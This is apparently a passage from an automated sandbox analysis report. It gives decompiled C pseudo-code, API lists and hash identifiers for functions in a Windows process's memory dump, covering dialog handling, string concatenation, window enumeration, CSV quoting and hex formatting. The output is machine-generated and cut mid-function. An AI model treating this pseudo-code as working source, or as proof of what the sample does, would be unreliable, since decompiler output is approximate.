                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                                          				void** _t11;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t11 = __eax;
                                                                                                                                                                                                                          				if( *0x4101b4 == 0) {
                                                                                                                                                                                                                          					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                                                                                                                          					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                                                                                                                          					 *0x4101b4 = 1;
                                                                                                                                                                                                                          					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                                                                                                                          					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                                                                                                                          					 *0x40f2f4 = _t7;
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                          • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                          				wchar_t* _t24;
                                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				_t25 = wcslen(__edi);
                                                                                                                                                                                                                          				_t10 = wcslen(_a4);
                                                                                                                                                                                                                          				_t23 = _t10 + _t25;
                                                                                                                                                                                                                          				if(_t23 >= 0x3ff) {
                                                                                                                                                                                                                          					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                                                                                                                          					if(_t12 > 0) {
                                                                                                                                                                                                                          						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcslen$wcscatwcsncat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 291873006-0
                                                                                                                                                                                                                          • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HWND__* _t11;
                                                                                                                                                                                                                          				struct HWND__* _t14;
                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t14 = __eax;
                                                                                                                                                                                                                          				_t16 = __ecx;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                                                                                                                          				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                                                                                                                          				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                                                                                                                          				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					E00402D99(_t15, _t16);
                                                                                                                                                                                                                          					_t11 = GetWindow(_t15, 2);
                                                                                                                                                                                                                          					_t15 = _t11;
                                                                                                                                                                                                                          				} while (_t15 != 0);
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                                                                                                                            • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4235085887-0
                                                                                                                                                                                                                          • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                          			E0040B6A6() {
                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                          				intOrPtr _t3;
                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t1 =  *0x41c458;
                                                                                                                                                                                                                          				if(_t1 != 0) {
                                                                                                                                                                                                                          					_push(_t1);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 =  *0x41c460;
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					_push(_t2);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t3 =  *0x41c45c;
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					_push(_t3);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t4 =  *0x41c464;
                                                                                                                                                                                                                          				if(_t4 != 0) {
                                                                                                                                                                                                                          					_push(_t4);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          					return _t4;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				wchar_t* _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                                          				wchar_t* _t41;
                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				wchar_t* _t53;
                                                                                                                                                                                                                          				wchar_t* _t62;
                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                          				wchar_t* _t75;
                                                                                                                                                                                                                          				wchar_t* _t79;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t66 = __ebx;
                                                                                                                                                                                                                          				_t75 = 0;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                                                                                                                          						_t68 = _a8;
                                                                                                                                                                                                                          						if(_t68 != _t75) {
                                                                                                                                                                                                                          							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t41 = wcschr(_t79, 0x2c);
                                                                                                                                                                                                                          						_pop(_t70);
                                                                                                                                                                                                                          						if(_t41 != 0) {
                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                          							_v20 = _t75;
                                                                                                                                                                                                                          							_v28 = _t75;
                                                                                                                                                                                                                          							_v36 = _t75;
                                                                                                                                                                                                                          							_v24 = 0x100;
                                                                                                                                                                                                                          							_v32 = 1;
                                                                                                                                                                                                                          							_v16 = 0x22;
                                                                                                                                                                                                                          							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                          								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                                                                                                                          								__eflags = _t45;
                                                                                                                                                                                                                          								_v12 = _t45;
                                                                                                                                                                                                                          								_t77 =  &_v36;
                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = _t45 - 0x22;
                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                          									_push( &_v12);
                                                                                                                                                                                                                          									_t48 = 1;
                                                                                                                                                                                                                          									__eflags = 1;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_push(L"\"\"");
                                                                                                                                                                                                                          									_t48 = _t45 | 0xffffffff;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                                                                                                                          								_t79 =  &(_t79[0]);
                                                                                                                                                                                                                          								__eflags = _t79;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                                                                                                                          							_t53 = _v20;
                                                                                                                                                                                                                          							__eflags = _t53;
                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                          								_t53 = 0x40c4e8;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                                                                                                                          							_t75 = 0;
                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t62 = wcschr(_t79, 0x22);
                                                                                                                                                                                                                          							_pop(_t70);
                                                                                                                                                                                                                          							if(_t62 != 0) {
                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								E00407343(_t66, _a4, _t79);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                                                                                                                          							E00407343(_t66, _a4, ",");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073A4
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073B2
                                                                                                                                                                                                                            • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                                                                                                                            • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                          • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                                                          				signed short _v65616;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                          				intOrPtr* _t51;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                                          				E0040B550(0x1004c, __ecx);
                                                                                                                                                                                                                          				_t39 = 0;
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_push( &_v8);
                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                                                                                                                          				_push(L"Lines");
                                                                                                                                                                                                                          				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                                                                                                                          				if(_v8 > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t6 = _t39 + 1; // 0x1
                                                                                                                                                                                                                          						_t28 = _t6;
                                                                                                                                                                                                                          						_push(_t28);
                                                                                                                                                                                                                          						_push(L"Line%d");
                                                                                                                                                                                                                          						_v12 = _t28;
                                                                                                                                                                                                                          						_push(0x1f);
                                                                                                                                                                                                                          						_push( &_v80);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t52 = _t52 + 0x10;
                                                                                                                                                                                                                          						_push(0x7fff);
                                                                                                                                                                                                                          						_push(0x40c4e8);
			if( *((intOrPtr*)(_t51 + 4)) == 0) {
				_v65616 = _v65616 & 0x00000000;
				 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
				_t34 = E004054DF(_a4, _t51,  &_v65616);
			} else {
				_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
			}
			_t39 = _v12;
		} while (_t39 < _v8);
		return _t34;
	}
	return _t27;
}

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: _snwprintf
• String ID: Line%d$Lines
• API String ID: 3988819677-2790224864
• Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
• Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
• Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
• Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
	void* _v8;
	void* _v26;
	void _v28;
	void* _t24;
	void* _t25;
	void* _t35;
	signed int _t38;
	signed int _t42;
	void* _t44;
	void* _t45;

	_t24 = _a12;
	_t45 = _t44 - 0x18;
	_t42 = 0;
	 *_t24 = 0;
	if(_a8 <= 0) {
		_t25 = 0;
	} else {
		_t38 = 0;
		_t35 = 0;
		if(_a8 > 0) {
			_v8 = _t24;
			while(1) {
				_v28 = _v28 & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_push( *(_t35 + _a4) & 0x000000ff);
				_push(L"%2.2X ");
				_push(0xa);
				_push( &_v28);
				L0040B1EC();
				_t38 = _t42;
				memcpy(_v8,  &_v28, 6);
				_t13 = _t42 + 3; // 0x3
				_t45 = _t45 + 0x1c;
				if(_t13 >= 0x2000) {
					break;
				}
				_v8 = _v8 + 6;
				_t35 = _t35 + 1;
				_t42 = _t42 + 3;
				if(_t35 < _a8) {
					continue;
				}
				break;
			}
			_t24 = _a12;
		}
		 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
		_t25 = 1;
	}
	return _t25;
}
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405196
                                                                                                                                                                                                                          0x0040519a
                                                                                                                                                                                                                          0x0040519b
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a6
                                                                                                                                                                                                                          0x004051af
                                                                                                                                                                                                                          0x004051b0
                                                                                                                                                                                                                          0x004051b7

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                          • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                          			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t35 = __esi;
                                                                                                                                                                                                                          				_t34 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                                                                                                                          						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                                                                                                                          						_push( &_v44);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t36 = _t36 + 0x24;
                                                                                                                                                                                                                          						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                                                                                                                          						_t34 = _t34 + 1;
                                                                                                                                                                                                                          					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                          • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
